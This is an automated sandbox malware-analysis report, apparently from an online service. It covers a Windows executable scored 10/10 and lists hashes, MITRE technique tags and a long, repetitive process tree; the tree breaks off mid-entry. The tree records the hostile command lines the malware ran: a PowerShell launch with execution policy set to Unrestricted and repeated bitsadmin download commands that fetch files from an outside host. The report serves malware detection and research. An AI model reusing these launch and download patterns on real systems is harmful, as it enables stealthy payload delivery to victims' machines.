580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63

Analysis

max time kernel
151s
max time network
175s
platform
windows7_x64
resource
win7-20220414-en
submitted
30-05-2022 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63.exe
Size

386KB
MD5

8a405c527be3468739c3ae626305ea60
SHA1

6461e343fd6ee5be0a1ce80a933278a1c11c9292
SHA256

580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63
SHA512

79a4823bd6995d9d6868bed2dbdfd324a3ca7af1e1aa4696255602f20df90258e7693c0292c579aa5a8e903d0504f6edd64c06ab868c621997217d20b038ef72

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://chocolatey.org/7za.exe

Signatures

Blocklisted process makes network request 64 IoCs

flow	pid	Process
5	1000	powershell.exe
6	1000	powershell.exe
10	1000	powershell.exe
11	1000	powershell.exe
14	1000	powershell.exe
15	1000	powershell.exe
18	1000	powershell.exe
19	1000	powershell.exe
22	1000	powershell.exe
23	1000	powershell.exe
26	1000	powershell.exe
27	1000	powershell.exe
30	1000	powershell.exe
31	1000	powershell.exe
34	1000	powershell.exe
35	1000	powershell.exe
38	1000	powershell.exe
39	1000	powershell.exe
42	1000	powershell.exe
43	1000	powershell.exe
46	1000	powershell.exe
47	1000	powershell.exe
50	1000	powershell.exe
51	1000	powershell.exe
54	1000	powershell.exe
55	1000	powershell.exe
58	1000	powershell.exe
59	1000	powershell.exe
62	1000	powershell.exe
63	1000	powershell.exe
66	1000	powershell.exe
67	1000	powershell.exe
70	1000	powershell.exe
71	1000	powershell.exe
74	1000	powershell.exe
75	1000	powershell.exe
78	1000	powershell.exe
79	1000	powershell.exe
82	1000	powershell.exe
83	1000	powershell.exe
86	1000	powershell.exe
87	1000	powershell.exe
90	1000	powershell.exe
91	1000	powershell.exe
94	1000	powershell.exe
95	1000	powershell.exe
98	1000	powershell.exe
99	1000	powershell.exe
102	1000	powershell.exe
103	1000	powershell.exe
106	1000	powershell.exe
107	1000	powershell.exe
110	1000	powershell.exe
111	1000	powershell.exe
114	1000	powershell.exe
115	1000	powershell.exe
118	1000	powershell.exe
119	1000	powershell.exe
122	1000	powershell.exe
123	1000	powershell.exe
126	1000	powershell.exe
127	1000	powershell.exe
130	1000	powershell.exe
131	1000	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 34 IoCs

dropper

BITS Jobs

T1197

pid	Process
1412	bitsadmin.exe
1500	bitsadmin.exe
1940	bitsadmin.exe
968	bitsadmin.exe
2040	bitsadmin.exe
2000	bitsadmin.exe
1908	bitsadmin.exe
684	bitsadmin.exe
1360	bitsadmin.exe
1696	bitsadmin.exe
1872	bitsadmin.exe
2008	bitsadmin.exe
816	bitsadmin.exe
1104	bitsadmin.exe
1488	bitsadmin.exe
916	bitsadmin.exe
1628	bitsadmin.exe
1308	bitsadmin.exe
2024	bitsadmin.exe
1620	bitsadmin.exe
1544	bitsadmin.exe
1368	bitsadmin.exe
1524	bitsadmin.exe
1644	bitsadmin.exe
560	bitsadmin.exe
1744	bitsadmin.exe
916	bitsadmin.exe
268	bitsadmin.exe
1464	bitsadmin.exe
1916	bitsadmin.exe
392	bitsadmin.exe
1076	bitsadmin.exe
1184	bitsadmin.exe
1088	bitsadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe
1000	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1000	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1928 wrote to memory of 1124	1928	580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63.exe	30
PID 1928 wrote to memory of 1124	1928	580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63.exe	30
PID 1928 wrote to memory of 1124	1928	580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63.exe	30
PID 1928 wrote to memory of 1124	1928	580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63.exe	30
PID 1124 wrote to memory of 1000	1124	cmd.exe	32
PID 1124 wrote to memory of 1000	1124	cmd.exe	32
PID 1124 wrote to memory of 1000	1124	cmd.exe	32
PID 1124 wrote to memory of 1000	1124	cmd.exe	32
PID 1124 wrote to memory of 1232	1124	cmd.exe	33
PID 1124 wrote to memory of 1232	1124	cmd.exe	33
PID 1124 wrote to memory of 1232	1124	cmd.exe	33
PID 1124 wrote to memory of 1232	1124	cmd.exe	33
PID 1000 wrote to memory of 1884	1000	powershell.exe	34
PID 1000 wrote to memory of 1884	1000	powershell.exe	34
PID 1000 wrote to memory of 1884	1000	powershell.exe	34
PID 1000 wrote to memory of 1884	1000	powershell.exe	34
PID 1884 wrote to memory of 1908	1884	cmd.exe	36
PID 1884 wrote to memory of 1908	1884	cmd.exe	36
PID 1884 wrote to memory of 1908	1884	cmd.exe	36
PID 1884 wrote to memory of 1908	1884	cmd.exe	36
PID 1000 wrote to memory of 1916	1000	powershell.exe	37
PID 1000 wrote to memory of 1916	1000	powershell.exe	37
PID 1000 wrote to memory of 1916	1000	powershell.exe	37
PID 1000 wrote to memory of 1916	1000	powershell.exe	37
PID 1916 wrote to memory of 1308	1916	cmd.exe	39
PID 1916 wrote to memory of 1308	1916	cmd.exe	39
PID 1916 wrote to memory of 1308	1916	cmd.exe	39
PID 1916 wrote to memory of 1308	1916	cmd.exe	39
PID 1000 wrote to memory of 1608	1000	powershell.exe	40
PID 1000 wrote to memory of 1608	1000	powershell.exe	40
PID 1000 wrote to memory of 1608	1000	powershell.exe	40
PID 1000 wrote to memory of 1608	1000	powershell.exe	40
PID 1608 wrote to memory of 1464	1608	cmd.exe	42
PID 1608 wrote to memory of 1464	1608	cmd.exe	42
PID 1608 wrote to memory of 1464	1608	cmd.exe	42
PID 1608 wrote to memory of 1464	1608	cmd.exe	42
PID 1000 wrote to memory of 1580	1000	powershell.exe	43
PID 1000 wrote to memory of 1580	1000	powershell.exe	43
PID 1000 wrote to memory of 1580	1000	powershell.exe	43
PID 1000 wrote to memory of 1580	1000	powershell.exe	43
PID 1580 wrote to memory of 392	1580	cmd.exe	45
PID 1580 wrote to memory of 392	1580	cmd.exe	45
PID 1580 wrote to memory of 392	1580	cmd.exe	45
PID 1580 wrote to memory of 392	1580	cmd.exe	45
PID 1000 wrote to memory of 1996	1000	powershell.exe	46
PID 1000 wrote to memory of 1996	1000	powershell.exe	46
PID 1000 wrote to memory of 1996	1000	powershell.exe	46
PID 1000 wrote to memory of 1996	1000	powershell.exe	46
PID 1996 wrote to memory of 2024	1996	cmd.exe	48
PID 1996 wrote to memory of 2024	1996	cmd.exe	48
PID 1996 wrote to memory of 2024	1996	cmd.exe	48
PID 1996 wrote to memory of 2024	1996	cmd.exe	48
PID 1000 wrote to memory of 1852	1000	powershell.exe	49
PID 1000 wrote to memory of 1852	1000	powershell.exe	49
PID 1000 wrote to memory of 1852	1000	powershell.exe	49
PID 1000 wrote to memory of 1852	1000	powershell.exe	49
PID 1852 wrote to memory of 1412	1852	cmd.exe	51
PID 1852 wrote to memory of 1412	1852	cmd.exe	51
PID 1852 wrote to memory of 1412	1852	cmd.exe	51
PID 1852 wrote to memory of 1412	1852	cmd.exe	51
PID 1000 wrote to memory of 1104	1000	powershell.exe	52
PID 1000 wrote to memory of 1104	1000	powershell.exe	52
PID 1000 wrote to memory of 1104	1000	powershell.exe	52
PID 1000 wrote to memory of 1104	1000	powershell.exe	52

C:\Users\Admin\AppData\Local\Temp\580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63.exe
"C:\Users\Admin\AppData\Local\Temp\580ab691ca271c0c7779a29c3ddd882250bfd763d40c05c9d60809a087cace63.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -ep Unrestricted -f "C:\ProgramData\uc321vVJr.ps1" | find /v "" >> "C:\Users\Admin\AppData\Local\Temp\AUVQQRRF.log"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep Unrestricted -f "C:\ProgramData\uc321vVJr.ps1"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1000
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1884
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1908
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1916
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1308
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1608
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1464
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1580
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:392
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1996
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:2024
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1852
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1412
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1104
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:684
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:944
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1696
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1068
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1076
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1892
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1524
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1512
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1360
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1164
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1500
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1152
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1620
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1604
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1644
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1304
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:816
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1388
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1184
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1428
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1940
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1608
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1872
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1620
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:560
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1308
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1544
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1536
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1368
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1244
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1916
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1736
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1744
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1076
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:968
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1292
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1088
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:892
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:916
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1108
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1104
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1908
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1828
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:2040
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1388
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:268
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1732
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:2008
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1316
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
        5⤵
        Download via BitsAdmin
        
        PID:2000
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /b /c bitsadmin /transfer /download /priority HIGH "https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg" "C:\Users\Admin\AppData\Local\Temp\1rd5ecSsNOnTQZ.zip"
      4⤵
      PID:1412
    - - C:\Windows\SysWOW64\bitsadmin.exe
        
